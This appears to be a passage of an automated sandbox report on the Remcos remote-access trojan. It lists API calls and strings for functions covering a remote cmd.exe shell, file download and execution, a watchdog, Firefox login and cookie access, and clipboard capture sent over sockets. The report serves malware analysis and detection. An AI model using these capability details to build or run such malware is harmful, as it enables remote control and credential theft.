                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventObjectSingleWaitrecv
                                                                • String ID:
                                                                • API String ID: 311754179-0
                                                                • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                                • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                                                • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                                • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: @
                                                                • API String ID: 1890195054-2766056989
                                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEventStartupsocket
                                                                • String ID:
                                                                • API String ID: 1953588214-0
                                                                • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 0041BAB8
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$ForegroundText
                                                                • String ID:
                                                                • API String ID: 29597999-0
                                                                • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                                • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                                • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID:
                                                                • API String ID: 176396367-0
                                                                • Opcode ID: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                                • Opcode Fuzzy Hash: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                APIs
                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Deallocatestd::_
                                                                • String ID:
                                                                • API String ID: 1323251999-0
                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                • API String ID: 2994406822-18413064
                                                                • Opcode ID: 8bdfee77c0bc64ed19f90f7a2553bef14ccf10143dc3843060a054143451180f
                                                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                • Opcode Fuzzy Hash: 8bdfee77c0bc64ed19f90f7a2553bef14ccf10143dc3843060a054143451180f
                                                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                                  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                • API String ID: 1067849700-1507758755
                                                                • Opcode ID: 3d68fc61a9f35f776504c00baf08c4de18b1579f627655a32f7a07cf0a426998
                                                                • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                • Opcode Fuzzy Hash: 3d68fc61a9f35f776504c00baf08c4de18b1579f627655a32f7a07cf0a426998
                                                                • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                • API String ID: 3018269243-13974260
                                                                • Opcode ID: 66080fc72d488257d1ea0b2245dfa7a009f0c22fb4aa4407c274fce46e5546ae
                                                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                • Opcode Fuzzy Hash: 66080fc72d488257d1ea0b2245dfa7a009f0c22fb4aa4407c274fce46e5546ae
                                                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                • API String ID: 1164774033-3681987949
                                                                • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 0536758F
                                                                • EmptyClipboard.USER32 ref: 0536759D
                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 053675BD
                                                                • GlobalFix.KERNEL32(00000000), ref: 053675C6
                                                                • GlobalUnWire.KERNEL32(00000000), ref: 053675FC
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 05367605
                                                                • CloseClipboard.USER32 ref: 05367622
                                                                • OpenClipboard.USER32 ref: 05367629
                                                                • GetClipboardData.USER32(0000000D), ref: 05367639
                                                                • GlobalFix.KERNEL32(00000000), ref: 05367642
                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0536764B
                                                                • CloseClipboard.USER32 ref: 05367651
                                                                  • Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$Global$CloseDataOpenWire$AllocEmptysend
                                                                • String ID: !D@$hdF
                                                                • API String ID: 3354723728-3475379602
                                                                • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                                                • Instruction ID: 96bf700a0c07361ced898d90934385fe81288e8584456d9ade9255efb9beeae2
                                                                • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                                                • Instruction Fuzzy Hash: 3C214A76704300DBDB14BBB09C5CEBF36A9AF98652F40582DFC4782191EF248D05CA66
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 004168C2
                                                                • EmptyClipboard.USER32 ref: 004168D0
                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                • CloseClipboard.USER32 ref: 00416955
                                                                • OpenClipboard.USER32 ref: 0041695C
                                                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                • CloseClipboard.USER32 ref: 00416984
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                • String ID: !D@
                                                                • API String ID: 3520204547-604454484
                                                                • Opcode ID: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
                                                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                • Opcode Fuzzy Hash: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
                                                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$File$FirstNext
                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 3527384056-432212279
                                                                • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                                • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
